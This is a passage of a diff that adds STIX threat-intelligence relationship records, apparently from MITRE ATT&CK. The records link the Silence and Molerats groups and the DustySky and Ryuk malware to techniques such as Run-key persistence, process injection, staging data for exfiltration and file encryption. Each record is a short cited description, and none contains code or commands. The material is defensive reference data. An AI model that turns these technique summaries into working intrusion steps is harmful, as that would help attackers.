+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used ProxyBot, which allows the attacker to redirect traffic from the current node to the backconnect server via Sock4\\Socks5.(Citation: Group IB Silence Sept 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--89077d0b-aaa2-48b9-90d7-e253a550bfad",
+ "type": "relationship",
+ "modified": "2020-05-13T19:06:23.919Z",
+ "created": "2020-05-13T19:06:23.919Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used port 444 when sending data about the system from the client to the server.(Citation: Group IB Silence Sept 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--01c982c2-f610-443f-ae60-1b4a1f508f81",
+ "type": "relationship",
+ "modified": "2020-05-13T19:06:23.934Z",
+ "created": "2020-05-13T19:06:23.934Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) saved malicious files within the AppData and Startup folders to maintain persistence.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--aa4038e3-451f-4ad7-acc7-5c971825967b",
+ "type": "relationship",
+ "modified": "2020-05-14T14:30:09.500Z",
+ "created": "2020-05-13T19:39:41.704Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) used executables to download malicious files from different sources.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2fd0b80f-d053-4679-a350-1bb45b32ab49",
+ "type": "relationship",
+ "modified": "2020-05-13T19:39:41.717Z",
+ "created": "2020-05-13T19:39:41.717Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) has delivered compressed executables within ZIP files to victims.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--383a50af-eeeb-40e5-b4df-8a1a9c5baa69",
+ "type": "relationship",
+ "modified": "2020-05-14T15:35:08.907Z",
+ "created": "2020-05-13T19:39:41.727Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) has sent malicious links via email.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--21ebcd72-cb89-4d26-82b7-4d17843034c5",
+ "type": "relationship",
+ "modified": "2020-05-14T14:30:09.809Z",
+ "created": "2020-05-13T19:39:41.729Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) has sent malicious files via email.(Citation: Kaspersky MoleRATs April 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--e586e3c7-ed6b-4f6b-92e8-031f0acc84ef",
+ "type": "relationship",
+ "modified": "2020-05-14T14:30:09.803Z",
+ "created": "2020-05-13T19:39:41.738Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) has sent phishing emails with malicious attachments.(Citation: Kaspersky MoleRATs April 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--5a9f2571-e611-4f7f-b0c9-6fc2d306b2f6",
+ "type": "relationship",
+ "modified": "2020-05-13T19:39:41.741Z",
+ "created": "2020-05-13T19:39:41.741Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) has sent phishing emails with malicious links included.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7fd1b042-8543-46f7-90d5-631500f17e9e",
+ "type": "relationship",
+ "modified": "2020-05-13T19:39:41.781Z",
+ "created": "2020-05-13T19:39:41.781Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) used various implants, including those built with VBScript, on target machines.(Citation: Kaspersky MoleRATs April 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b5ba1f46-0dd0-49f7-9d24-3822153229ba",
+ "type": "relationship",
+ "modified": "2020-06-24T19:11:10.772Z",
+ "created": "2020-05-13T19:39:41.804Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) used various implants, including those built with JS, on target machines.(Citation: Kaspersky MoleRATs April 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--cbba2f85-d5f4-4306-a219-5eea6c59dbb6",
+ "type": "relationship",
+ "modified": "2020-06-24T19:11:10.774Z",
+ "created": "2020-05-13T19:39:41.811Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) used PowerShell implants on target machines.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b2562bd3-5f78-4bcb-a37b-cae2b415c629",
+ "type": "relationship",
+ "modified": "2020-05-14T14:30:09.879Z",
+ "created": "2020-05-13T19:39:41.842Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) created folders in temp directories to host collected files before exfiltration.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7e7c0aa8-a17e-4079-b1fd-188977cf1a6e",
+ "type": "relationship",
+ "modified": "2020-05-13T19:59:39.312Z",
+ "created": "2020-05-13T19:59:39.312Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) has exfiltrated data to the C2 server.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5434447a-d954-4106-9657-ee62a4acf27b",
+ "type": "relationship",
+ "modified": "2020-05-14T15:14:34.060Z",
+ "created": "2020-05-13T19:59:39.327Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) can compress files via RAR while staging data to be exfiltrated.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--51300de6-0f80-45dc-92f7-f48dbc887d8c",
+ "type": "relationship",
+ "modified": "2020-05-14T15:14:34.267Z",
+ "created": "2020-05-13T19:59:39.331Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) captures PNG screenshots of the main screen.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a724a449-cd4d-419a-90a0-cdd5927c60b7",
+ "type": "relationship",
+ "modified": "2020-05-13T19:59:39.334Z",
+ "created": "2020-05-13T19:59:39.334Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has constructed legitimate appearing installation folder paths by calling GetWindowsDirectoryW and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as C:\\Users\\Public.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5cba4a5e-c005-495d-9cd6-60794d9b3247",
+ "type": "relationship",
+ "modified": "2020-05-15T19:13:48.286Z",
+ "created": "2020-05-14T13:59:58.133Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has used a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--adbb2fb8-9a9f-4068-b123-7b557491861d",
+ "type": "relationship",
+ "modified": "2020-05-14T13:59:58.140Z",
+ "created": "2020-05-14T13:59:58.140Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has used cmd.exe to create a Registry entry to establish persistence.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5a7aeb29-4f1c-43e4-9efa-dc6fb812f281",
+ "type": "relationship",
+ "modified": "2020-05-14T14:27:31.195Z",
+ "created": "2020-05-14T14:27:31.195Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has used the Windows command line to create a Registry entry under HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run to establish persistence.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e168a29f-c975-4ae9-8ab9-470bb03ae706",
+ "type": "relationship",
+ "modified": "2020-05-14T14:27:31.203Z",
+ "created": "2020-05-14T14:27:31.203Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has called GetLogicalDrives to emumerate all mounted drives, and GetDriveTypeW to determine the drive type.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9cf32fea-16cd-41cf-93f3-a47c1388abbc",
+ "type": "relationship",
+ "modified": "2020-05-14T14:27:31.210Z",
+ "created": "2020-05-14T14:27:31.210Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has called GetIpNetTable in attempt to identify all mounted drives and hosts that have Address Resolution Protocol (ARP) entries.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--eebf12c3-1146-4daa-8fd2-c74ad19362f6",
+ "type": "relationship",
+ "modified": "2020-05-15T19:13:48.359Z",
+ "created": "2020-05-14T14:27:31.213Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has used multiple native APIs including ShellExecuteW to run executables,GetWindowsDirectoryW to create folders, and VirtualAlloc, WriteProcessMemory, and CreateRemoteThread for process injection.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1790f5a1-b5d5-41a4-8da0-c75ed7a23b0d",
+ "type": "relationship",
+ "modified": "2020-05-15T21:51:10.377Z",
+ "created": "2020-05-14T14:27:31.229Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has called kill.bat for stopping services, disabling services and killing processes.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--60135ffa-b3f7-4aa8-b12e-faa2719dc5d7",
+ "type": "relationship",
+ "modified": "2020-05-14T14:38:22.607Z",
+ "created": "2020-05-14T14:38:22.607Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has called CreateToolhelp32Snapshot to enumerate all running processes.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--18d29bb2-655b-4e3d-9759-32a74be3eb75",
+ "type": "relationship",
+ "modified": "2020-05-14T14:38:22.630Z",
+ "created": "2020-05-14T14:38:22.630Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has attempted to adjust its token privileges to have the SeDebugPrivilege.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fa049cca-da7d-4d89-ac34-cab537ce0235",
+ "type": "relationship",
+ "modified": "2020-05-14T14:38:22.633Z",
+ "created": "2020-05-14T14:38:22.633Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has injected itself into remote processes to encrypt files using a combination of VirtualAlloc, WriteProcessMemory, and CreateRemoteThread.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--afdf9b0e-5539-464a-a403-202eaedb13cd",
+ "type": "relationship",
+ "modified": "2020-05-15T19:13:48.360Z",
+ "created": "2020-05-14T14:38:22.650Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6895e54e-3968-41a9-9013-a082cd46fa44",
+ "type": "relationship",
+ "modified": "2020-05-14T14:40:26.221Z",
+ "created": "2020-05-14T14:40:26.221Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
